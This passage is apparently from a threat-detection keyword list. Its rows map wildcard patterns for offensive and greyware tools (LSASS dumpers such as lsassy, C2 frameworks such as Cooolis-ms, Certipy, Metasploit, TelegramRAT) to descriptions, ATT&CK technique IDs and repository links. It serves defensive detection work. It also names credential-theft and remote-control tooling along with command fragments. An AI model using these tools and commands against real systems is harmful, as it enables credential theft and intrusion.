-*LsassSilentProcessExit.exe*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*LsassSilentProcessExit.vcxproj*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*LsassSilentProcessExit-master*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*lsassy *,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy -*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*lsassy -v -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*lsassy.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 
- T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy/dumpmethod*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy_dump*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*lsassy_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lsassy_dump.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*lsassy-linux-x64-*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy-MacOS-x64-*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy-windows-x64-*.exe,offensive_tool_keyword,lsassy,Extract 
credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lse.sh -l*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*luckystrike.ps1*,offensive_tool_keyword,luckystrike,A PowerShell based utility for the creation of malicious Office macro documents.,T1566 - T1059 - T1027,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/curi0usJack/luckystrike,1,1,N/A,N/A,10,1084,250,2017-11-03T17:52:13Z,2016-09-22T18:57:50Z -*LUgsLS1IT1NU*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*luijait/PwnKit*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z -*luks2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*lures create *,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,0,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*LVAsLS1QT1JU*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LW8sLS1vcHRpb25z*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LWIsLS1idWNrZXQ=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LWYsLS1maWxl*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LXAsLS1waWQ=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LXAsLS1wYXlsb2Fk*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*LXUsLS11cmk=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*ly4k/Certipy*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*ly4k/Certipy*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*ly4k/PassTheChallenge*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*lyncsmash*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations,T1580 - T1201 - T1071 - T1110 - T1078,TA0043 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash.git*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash.log*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash.py*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - 
TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*lyncsmash-master*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*LyncSniper*,offensive_tool_keyword,LyncSniper,LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365,T1566 - T1574 - T1210 - T1596,TA0002 - TA0011 - TA0009,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/LyncSniper,1,0,N/A,N/A,1,9,3,2017-04-11T08:38:28Z,2017-06-12T10:56:58Z -*-m * -d * -w * --top-web-ports*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,0,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*-m dumpert *,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*-M handlekatz -o *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*M.i.m.i.k.a.t.z*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - 
TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*m00zh33/golang_c2*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*m0rv4i/SharpCookieMonster*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*m3f157O/combine_harvester*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,1,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*m4ll0k/SecretFinder*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*MAAD_Attack.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*MAAD_Config.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*MAAD_Mitre_Map.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*MAADInitialization.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*mac.changer on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*mac_dirty_cow.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mac2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*mac2john-alt.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*MaccaroniC2.git*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*macchanger -r *,greyware_tool_keyword,macchanger,changing mac address with macchanger,T1497.001 - T1036.004 - T1059.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*macchanger -r*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,0,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*macdlemfnignjhclfcfichcdhiomgjjb*,greyware_tool_keyword,Free Fast VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - 
TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*MaceTrap.exe*,offensive_tool_keyword,macetrap,MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders,T1070.004,TA0040,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*machine1337/TelegramRAT*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*MacOS/ipscan -*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation 